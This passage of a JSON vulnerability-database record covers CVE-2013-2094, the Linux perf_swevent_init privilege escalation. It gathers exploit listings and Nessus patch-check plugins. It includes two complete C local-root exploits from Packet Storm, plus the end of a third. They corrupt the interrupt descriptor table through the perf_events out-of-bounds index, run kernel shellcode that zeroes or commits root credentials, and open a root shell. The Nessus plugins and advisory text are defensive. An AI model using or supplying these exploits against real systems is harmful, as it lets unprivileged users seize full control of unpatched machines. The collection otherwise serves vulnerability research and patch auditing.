"Can't find overwrite");\r\n\r\n\t\tsz = 24;\r\n\t\taddr = BASE_JUMP;\r\n\t\tprintf("detected CONFIG_JUMP_LABEL\\n");\r\n\t}\r\n\r\n\tmunmap(p[0], SIZE);\r\n\tmunmap(p[1], SIZE);\r\n\r\n\taddr += i;\r\n\taddr -= off * sz;\r\n\r\n\tprintf("perf_swevent_enabled is at 0x%lx\\n", addr);\r\n\r\n\tasm("sidt %0" : "=m" (idt));\r\n\r\n\tprintf("IDT at 0x%lx\\n", idt.addr);\r\n\r\n\toff = addr - idt.addr;\r\n\toff -= 8;\r\n\r\n\tswitch (off % sz) {\r\n\tcase 0:\r\n\t\tintr = 0;\r\n\t\tbreak;\r\n\r\n\tcase 8:\r\n\t\tintr = 0x80;\r\n\t\tbreak;\r\n\r\n\tcase 16:\r\n\t\tintr = 4;\r\n\t\tbreak;\r\n\r\n\tdefault:\r\n\t\terrx(1, "remainder %d", off % sz);\r\n\t}\r\n\r\n\tprintf("Using interrupt %d\\n", intr);\r\n\r\n\toff -= 16 * intr;\r\n\r\n\tassert((off % sz) == 0);\r\n\r\n\toff /= sz;\r\n\toff = -off;\r\n\r\n//\tprintf("Offset %lx\\n", off);\r\n\r\n\tkbase = (uint8_t*) (idt.addr & 0xFF000000);\r\n\r\n\tprintf("Shellcode at %p\\n", kbase);\r\n\r\n\tif (mmap(kbase, KSIZE, PROT_READ | PROT_WRITE | PROT_EXEC,\r\n\t MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0) == MAP_FAILED)\r\n\t\terr(1, "mmap()");\r\n\r\n\tmemset(kbase, 0x90, KSIZE);\r\n\tkbase += KSIZE - 1024;\r\n\r\n\ti = __sc_next - __sc_start;\r\n\tmemcpy(kbase, __sc_start, i);\r\n\tkbase += i;\r\n\tmemcpy(kbase, sc, 900);\r\n\r\n\tsc_replace(kbase, TMP(1), getuid());\r\n\tsc_replace(kbase, TMP(2), getgid());\r\n\r\n\tsignal(SIGALRM, morte);\r\n\talarm(2);\r\n\r\n\tprintf("Triggering sploit\\n");\r\n\t_fd = perf_open(off);\r\n\r\n\ttrigger(intr);\r\n\r\n\texit(0);\r\n}\r\n\n ", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-79777"}], "canvas": [{"lastseen": "2019-05-29T19:48:25", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2094"], "description": "**Name**| perf_swevent_init \n---|--- \n**CVE**| CVE-2013-2094 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| 
perf_swevent_init local root \n**Notes**| Repeatability: Infinite \nNotes: \n \nTested on: \n\\- Ubuntu 12.10 quantal x86_64 3.5.0-27-generic \n \n \nVENDOR: GNU/Linux \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2094 \nCVE Name: CVE-2013-2094 \n\n", "edition": 2, "modified": "2013-05-14T20:55:00", "published": "2013-05-14T20:55:00", "id": "PERF_SWEVENT_INIT", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/perf_swevent_init", "type": "canvas", "title": "Immunity Canvas: PERF_SWEVENT_INIT", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:17:33", "description": "", "published": "2013-06-11T00:00:00", "type": "packetstorm", "title": "Linux perf_swevent_init Local Root", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2094"], "modified": "2013-06-11T00:00:00", "id": "PACKETSTORM:121976", "href": "https://packetstormsecurity.com/files/121976/Linux-perf_swevent_init-Local-Root.html", "sourceData": "`/* \n* CVE-2013-2094 exploit x86_64 Linux < 3.8.9 \n* by sorbo (sorbo@darkircop.org) June 2013 \n* \n* Based on sd's exploit. Supports more targets. 
\n* \n*/ \n \n#define _GNU_SOURCE \n#include <string.h> \n#include <stdio.h> \n#include <unistd.h> \n#include <stdlib.h> \n#include <stdint.h> \n#include <sys/syscall.h> \n#include <sys/mman.h> \n#include <linux/perf_event.h> \n#include <signal.h> \n#include <assert.h> \n \n#define BASE 0x380000000 \n#define BASE_JUMP 0x1780000000 \n#define SIZE 0x10000000 \n#define KSIZE 0x2000000 \n \n#define TMP(x) (0xdeadbeef + (x)) \n \nstruct idt { \nuint16_t limit; \nuint64_t addr; \n} __attribute__((packed)); \n \nstatic int _fd; \n \nstatic int perf_open(uint64_t off) \n{ \nstruct perf_event_attr attr; \nint rc; \n \n// printf(\"perf open %lx [%d]\\n\", off, (int) off); \n \nmemset(&attr, 0, sizeof(attr)); \n \nattr.type = PERF_TYPE_SOFTWARE; \nattr.size = sizeof(attr); \nattr.config = off; \nattr.mmap = 1; \nattr.comm = 1; \nattr.exclude_kernel = 1; \n \nrc = syscall(SYS_perf_event_open, &attr, 0, -1, -1, 0); \n \nreturn rc; \n} \n \nvoid __sc_start(void); \nvoid __sc_next(void); \n \nvoid __sc(void) \n{ \nasm(\"__sc_start:\\n\" \n\"call __sc_next\\n\" \n\"iretq\\n\" \n\"__sc_next:\\n\"); \n} \n \nvoid sc(void) \n{ \nint i, j; \nuint8_t *current = *(uint8_t **)(((uint64_t) &i) & (-8192)); \nuint64_t kbase = ((uint64_t)current) >> 36; \nint uid = TMP(1); \nint gid = TMP(2); \n \nfor (i = 0; i < 4000; i += 4) { \nuint64_t *p = (void *) &current[i]; \nuint32_t *cred = (uint32_t*) p[0]; \n \nif ((p[0] != p[1]) || ((p[0]>>36) != kbase)) \ncontinue; \n \nfor (j = 0; j < 20; j++) { \nif (cred[j] == uid && cred[j + 1] == gid) { \nfor (i = 0; i < 8; i++) { \ncred[j + i] = 0; \nreturn; \n} \n} \n} \n} \n} \n \nstatic void sc_replace(uint8_t *sc, uint32_t needle, uint32_t val) \n{ \nvoid *p; \n \np = memmem(sc, 900, &needle, sizeof(needle)); \nif (!p) \nerrx(1, \"can't find %x\", needle); \n \nmemcpy(p, &val, sizeof(val)); \n} \n \nstatic void *map_mem(uint64_t addr) \n{ \nvoid *p; \n \np = mmap((void*) addr, SIZE, PROT_READ | PROT_WRITE, \nMAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, 
-1, 0); \n \nif (p == MAP_FAILED) \nerr(1, \"mmap()\"); \n \nreturn p; \n} \n \nstatic int find_mem(void *mem, uint8_t c) \n{ \nint i; \nuint8_t *p = mem; \n \nfor (i = 0; i < SIZE; i++) { \nif (p[i] == c) \nreturn i; \n} \n \nreturn -1; \n} \n \nstatic void dropshell() \n{ \nif (setuid(0) != 0) \nerrx(1, \"failed\"); \n \nprintf(\"Launching shell\\n\"); \n \nexecl(\"/bin/sh\", \"sh\", NULL); \nexit(0); \n} \n \nvoid morte(int x) \n{ \nprintf(\"Got signal\\n\"); \nclose(_fd); \ndropshell(); \n} \n \nstatic void trigger(int intr) \n{ \nswitch (intr) { \ncase 0: \ndo { \nint z = 1; \nint a = 1; \n \nz--; \n \na /= z; \n} while (0); \nbreak; \n \ncase 4: \nasm(\"int $4\"); \nbreak; \n \ncase 0x80: \nasm(\"int $0x80\"); \nbreak; \n \ndefault: \nerrx(1, \"unknown intr %d\", intr); \n} \n \nsleep(3); \n} \n \nint main(int argc, char *argv[]) \n{ \nuint32_t *p[2]; \nint fd, i; \nuint64_t off; \nuint64_t addr = BASE; \nstruct idt idt; \nuint8_t *kbase; \nint sz = 4; \nint intr = 4; \n \nprintf(\"Searchin...\\n\"); \n \np[0] = map_mem(BASE); \np[1] = map_mem(BASE_JUMP); \n \nmemset(p[1], 0x69, SIZE); \n \noff = 0xFFFFFFFFL; \nfd = perf_open(off); \nclose(fd); \n \ni = find_mem(p[0], 0xff); \nif (i == -1) { \ni = find_mem(p[1], 0x68); \n \nif (i == -1) \nerrx(1, \"Can't find overwrite\"); \n \nsz = 24; \naddr = BASE_JUMP; \nprintf(\"detected CONFIG_JUMP_LABEL\\n\"); \n} \n \nmunmap(p[0], SIZE); \nmunmap(p[1], SIZE); \n \naddr += i; \naddr -= off * sz; \n \nprintf(\"perf_swevent_enabled is at 0x%lx\\n\", addr); \n \nasm(\"sidt %0\" : \"=m\" (idt)); \n \nprintf(\"IDT at 0x%lx\\n\", idt.addr); \n \noff = addr - idt.addr; \noff -= 8; \n \nswitch (off % sz) { \ncase 0: \nintr = 0; \nbreak; \n \ncase 8: \nintr = 0x80; \nbreak; \n \ncase 16: \nintr = 4; \nbreak; \n \ndefault: \nerrx(1, \"remainder %d\", off % sz); \n} \n \nprintf(\"Using interrupt %d\\n\", intr); \n \noff -= 16 * intr; \n \nassert((off % sz) == 0); \n \noff /= sz; \noff = -off; \n \n// printf(\"Offset %lx\\n\", 
off); \n \nkbase = (uint8_t*) (idt.addr & 0xFF000000); \n \nprintf(\"Shellcode at %p\\n\", kbase); \n \nif (mmap(kbase, KSIZE, PROT_READ | PROT_WRITE | PROT_EXEC, \nMAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0) == MAP_FAILED) \nerr(1, \"mmap()\"); \n \nmemset(kbase, 0x90, KSIZE); \nkbase += KSIZE - 1024; \n \ni = __sc_next - __sc_start; \nmemcpy(kbase, __sc_start, i); \nkbase += i; \nmemcpy(kbase, sc, 900); \n \nsc_replace(kbase, TMP(1), getuid()); \nsc_replace(kbase, TMP(2), getgid()); \n \nsignal(SIGALRM, morte); \nalarm(2); \n \nprintf(\"Triggering sploit\\n\"); \n_fd = perf_open(off); \n \ntrigger(intr); \n \nexit(0); \n} \n \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/121976/sorbolinux-exec.txt"}, {"lastseen": "2016-12-05T22:23:30", "description": "", "published": "2014-06-02T00:00:00", "type": "packetstorm", "title": "Ubuntu 12.04 3.x x86_64 perf_swevent_init Local Root", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2094"], "modified": "2014-06-02T00:00:00", "id": "PACKETSTORM:126880", "href": "https://packetstormsecurity.com/files/126880/Ubuntu-12.04-3.x-x86_64-perf_swevent_init-Local-Root.html", "sourceData": "`/** \n* Ubuntu 12.04 3.x x86_64 perf_swevent_init Local root exploit \n* by Vitaly Nikolenko (vnik5287@gmail.com) \n* \n* based on semtex.c by sd \n* \n* Supported targets: \n* [0] Ubuntu 12.04.0 - 3.2.0-23-generic \n* [1] Ubuntu 12.04.1 - 3.2.0-29-generic \n* [2] Ubuntu 12.04.2 - 3.5.0-23-generic \n* \n* $ gcc vnik.c -O2 -o vnik \n* \n* $ uname -r \n* 3.2.0-23-generic \n* \n* $ ./vnik 0 \n*/ \n \n#define _GNU_SOURCE 1 \n#include <stdint.h> \n#include <stdio.h> \n#include <stdlib.h> \n#include <string.h> \n#include <unistd.h> \n#include <sys/mman.h> \n#include <syscall.h> \n#include <stdint.h> \n#include <assert.h> \n \n#define BASE 0x1780000000 \n#define SIZE 0x0010000000 \n#define KSIZE 0x2000000 \n#define AB(x) 
((uint64_t)((0xababababLL<<32)^((uint64_t)((x)*313337)))) \n \ntypedef int __attribute__((regparm(3))) (*commit_creds_fn)(unsigned long cred); \ntypedef unsigned long __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(unsigned long cred); \n \nuint64_t targets[3][3] = \n{{0xffffffff81ef67e0, // perf_swevent_enabled \n0xffffffff81091630, // commit_creds \n0xffffffff810918e0}, // prepare_kernel_cred \n{0xffffffff81ef67a0, \n0xffffffff81091220, \n0xffffffff810914d0}, \n{0xffffffff81ef5940, \n0xffffffff8107ee30, \n0xffffffff8107f0c0} \n}; \n \nvoid __attribute__((regparm(3))) payload() { \nuint32_t *fixptr = (void*)AB(1); \n// restore the handler \n*fixptr = -1; \ncommit_creds_fn commit_creds = (commit_creds_fn)AB(2); \nprepare_kernel_cred_fn prepare_kernel_cred = (prepare_kernel_cred_fn)AB(3); \ncommit_creds(prepare_kernel_cred((uint64_t)NULL)); \n} \n \nvoid trigger(uint32_t off) { \nuint64_t buf[10] = { 0x4800000001, off, 0, 0, 0, 0x300 }; \nint fd = syscall(298, buf, 0, -1, -1, 0); \nassert( !close(fd) ); \n} \n \nint main(int argc, char **argv) { \nuint64_t off64, needle, kbase, *p; \nuint8_t *code; \nuint32_t int_n, j = 5, target = 1337; \nint offset = 0; \nvoid *map; \n \nassert(argc == 2 && \"target?\"); \nassert( (target = atoi(argv[1])) < 3 ); \n \nstruct { \nuint16_t limit; \nuint64_t addr; \n} __attribute__((packed)) idt; \n \n// mmap user-space block so we don't page fault \n// on sw_perf_event_destroy \nassert((map = mmap((void*)BASE, SIZE, 3, 0x32, 0,0)) == (void*)BASE); \nmemset(map, 0, SIZE); \n \nasm volatile(\"sidt %0\" : \"=m\" (idt)); \nkbase = idt.addr & 0xff000000; \nprintf(\"IDT addr = 0x%lx\\n\", idt.addr); \n \nassert((code = (void*)mmap((void*)kbase, KSIZE, 7, 0x32, 0, 0)) == (void*)kbase); \nmemset(code, 0x90, KSIZE); code += KSIZE-1024; memcpy(code, &payload, 1024); \nmemcpy(code-13,\"\\x0f\\x01\\xf8\\xe8\\5\\0\\0\\0\\x0f\\x01\\xf8\\x48\\xcf\", 13); \n \n// can only play with interrupts 3, 4 and 0x80 \nfor (int_n = 3; int_n <= 0x80; 
int_n++) { \nfor (off64 = 0x00000000ffffffff; (int)off64 < 0; off64--) { \nint off32 = off64; \n \nif ((targets[target][0] + ((uint64_t)off32)*24) == (idt.addr + int_n*16 + 8)) { \noffset = off32; \ngoto out; \n} \n} \nif (int_n == 4) { \n// shit, let's try 0x80 if the kernel is compiled with \n// CONFIG_IA32_EMULATION \nint_n = 0x80 - 1; \n} \n} \nout: \nassert(offset); \nprintf(\"Using int = %d with offset = %d\\n\", int_n, offset); \n \nfor (j = 0; j < 3; j++) { \nneedle = AB(j+1); \nassert(p = memmem(code, 1024, &needle, 8)); \n*p = !j ? (idt.addr + int_n * 16 + 8) : targets[target][j]; \n} \ntrigger(offset); \nswitch (int_n) { \ncase 3: \nasm volatile(\"int $0x03\"); \nbreak; \ncase 4: \nasm volatile(\"int $0x04\"); \nbreak; \ncase 0x80: \nasm volatile(\"int $0x80\"); \n} \n \nassert(!setuid(0)); \nreturn execl(\"/bin/bash\", \"-sh\", NULL); \n} \n \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/126880/ubuntuperfswevent-exec.txt"}], "nessus": [{"lastseen": "2021-01-01T06:39:37", "description": "An flaw was discovered in the Linux kernel's perf_events interface. A\nlocal user could exploit this flaw to escalate privileges on the\nsystem.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2013-05-16T00:00:00", "title": "Ubuntu 12.10 : linux vulnerability (USN-1826-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2094"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.5-highbank", "cpe:/o:canonical:ubuntu_linux:12.10", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.5-generic"], "id": "UBUNTU_USN-1826-1.NASL", "href": "https://www.tenable.com/plugins/nessus/66469", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1826-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66469);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/09/19 12:54:29\");\n\n script_cve_id(\"CVE-2013-2094\");\n script_xref(name:\"USN\", value:\"1826-1\");\n\n script_name(english:\"Ubuntu 12.10 : linux vulnerability (USN-1826-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An flaw was discovered in the Linux kernel's perf_events interface. A\nlocal user could exploit this flaw to escalate privileges on the\nsystem.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1826-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-3.5-generic and / or\nlinux-image-3.5-highbank packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.5-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.5-highbank\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/05/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2013-2019 Canonical, Inc. / NASL script (C) 2013-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2013-2094\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-1826-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.10\", pkgname:\"linux-image-3.5.0-30-generic\", pkgver:\"3.5.0-30.51\")) flag++;\nif (ubuntu_check(osver:\"12.10\", pkgname:\"linux-image-3.5.0-30-highbank\", pkgver:\"3.5.0-30.51\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.5-generic / linux-image-3.5-highbank\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T06:39:36", "description": "An flaw 
was discovered in the Linux kernel's perf_events interface. A\nlocal user could exploit this flaw to escalate privileges on the\nsystem.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 27, "published": "2013-05-16T00:00:00", "title": "Ubuntu 12.04 LTS : linux vulnerability (USN-1825-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2094"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-virtual", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic-pae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-highbank", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-1825-1.NASL", "href": "https://www.tenable.com/plugins/nessus/66468", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1825-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66468);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/09/19 12:54:29\");\n\n script_cve_id(\"CVE-2013-2094\");\n script_xref(name:\"USN\", value:\"1825-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS : linux vulnerability (USN-1825-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An flaw was discovered in the Linux kernel's perf_events interface. 
A\nlocal user could exploit this flaw to escalate privileges on the\nsystem.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1825-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-highbank\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-virtual\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/05/16\");\n 
script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2013-2019 Canonical, Inc. / NASL script (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2013-2094\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-1825-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-43-generic\", pkgver:\"3.2.0-43.68\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-43-generic-pae\", pkgver:\"3.2.0-43.68\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-43-highbank\", pkgver:\"3.2.0-43.68\")) flag++;\nif (ubuntu_check(osver:\"12.04\", 
pkgname:\"linux-image-3.2.0-43-virtual\", pkgver:\"3.2.0-43.68\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.2-generic / linux-image-3.2-generic-pae / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:12:34", "description": "Updated kernel packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6.2 Extended Update Support.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issue :\n\n* It was found that the Red Hat Enterprise Linux 6.1 kernel update\n(RHSA-2011:0542) introduced an integer conversion issue in the Linux\nkernel's Performance Events implementation. This led to a\nuser-supplied index into the perf_swevent_enabled array not being\nvalidated properly, resulting in out-of-bounds kernel memory access. A\nlocal, unprivileged user could use this flaw to escalate their\nprivileges. (CVE-2013-2094, Important)\n\nA public exploit that affects Red Hat Enterprise Linux 6 is available.\n\nRefer to Red Hat Knowledge Solution 373743, linked to in the\nReferences, for further information and mitigation instructions for\nusers who are unable to immediately apply this update.\n\nUsers should upgrade to these updated packages, which contain a\nbackported patch to correct this issue. 
The system must be rebooted\nfor this update to take effect.", "edition": 25, "published": "2013-05-21T00:00:00", "title": "RHEL 6 : kernel (RHSA-2013:0840)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2094"], "modified": "2013-05-21T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x", "p-cpe:/a:redhat:enterprise_linux:kernel-firmware", "p-cpe:/a:redhat:enterprise_linux:kernel-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debug", "p-cpe:/a:redhat:enterprise_linux:kernel-headers", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo", 